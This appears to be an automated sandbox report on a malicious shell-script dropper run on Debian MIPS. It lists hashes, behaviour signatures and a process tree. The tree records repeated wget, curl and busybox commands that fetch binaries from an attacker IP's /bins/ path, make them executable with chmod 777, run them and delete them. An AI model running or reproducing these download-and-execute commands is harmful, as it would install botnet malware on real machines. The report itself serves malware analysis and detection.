Analysis
-
max time kernel
92s -
max time network
95s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/11/2024, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
-
Size
10KB
-
MD5
b643808c01faa0f92bf870288eb8dd16
-
SHA1
494306996b3ee0573b6da340ee334523cd39f9eb
-
SHA256
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad
-
SHA512
f8e2bed091a7cf127f3feadc979a7ee81e9835a68b98f78afc737f354cdf3348e42f4551cc47d805e0734fd77e02963e665aad84c33c02e18395f86754ae24cb
-
SSDEEP
96:+Hb3G9hf3INVTX1G+Emzer6e0D7tAokHbrf3+PTX1G+1emzer6wN6W:+Hb3VvTX1G+EmzereTX1G+Mmzerx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 912 chmod 738 chmod 858 chmod 852 chmod 870 chmod 882 chmod 954 chmod 960 chmod 752 chmod 900 chmod 936 chmod 972 chmod 978 chmod 744 chmod 894 chmod 966 chmod 876 chmod 838 chmod 906 chmod 807 chmod 864 chmod 888 chmod 924 chmod 942 chmod 801 chmod 948 chmod 930 chmod 918 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 739 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 745 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs 753 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q 802 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF 808 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB 840 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av 853 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC 859 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL 865 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P 871 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe 877 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy 883 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu 889 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f 895 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 901 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF 907 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB 913 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av 919 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC 925 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 931 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs 937 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q 943 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL 949 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu 955 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f 961 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P 967 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe 973 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy 979 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL curl File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 curl File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy curl File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC curl File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe curl File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f curl File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P curl File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs curl File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL curl File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu curl File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs curl File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q curl File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f curl File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC curl File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P curl File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 curl File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 curl File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF curl File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB curl File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe curl File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy curl File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q curl File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 curl File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu curl File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av curl File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF curl File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB curl File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av curl
Processes
-
/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:714
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:736
-
-
/bin/chmodchmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:740
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:741
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:743
-
-
/bin/chmodchmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:746
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:747
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:749
-
-
/bin/chmodchmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:756
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:757
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:770
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:800
-
-
/bin/chmodchmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:803
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:804
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:806
-
-
/bin/chmodchmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:812
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:813
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:833
-
-
/bin/chmodchmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:843
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:845
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:851
-
-
/bin/chmodchmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:857
-
-
/bin/chmodchmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:860
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:861
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:863
-
-
/bin/chmodchmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:866
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:867
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:869
-
-
/bin/chmodchmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:872
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:873
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:875
-
-
/bin/chmodchmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:878
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:879
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:881
-
-
/bin/chmodchmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:884
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:885
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:887
-
-
/bin/chmodchmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:890
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:891
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:893
-
-
/bin/chmodchmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:896
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:897
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:899
-
-
/bin/chmodchmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:902
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:903
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:905
-
-
/bin/chmodchmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:908
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:909
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:911
-
-
/bin/chmodchmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:914
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:915
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:917
-
-
/bin/chmodchmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:920
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:921
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:923
-
-
/bin/chmodchmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:926
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:927
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:929
-
-
/bin/chmodchmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:932
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:933
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:935
-
-
/bin/chmodchmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:938
-
-
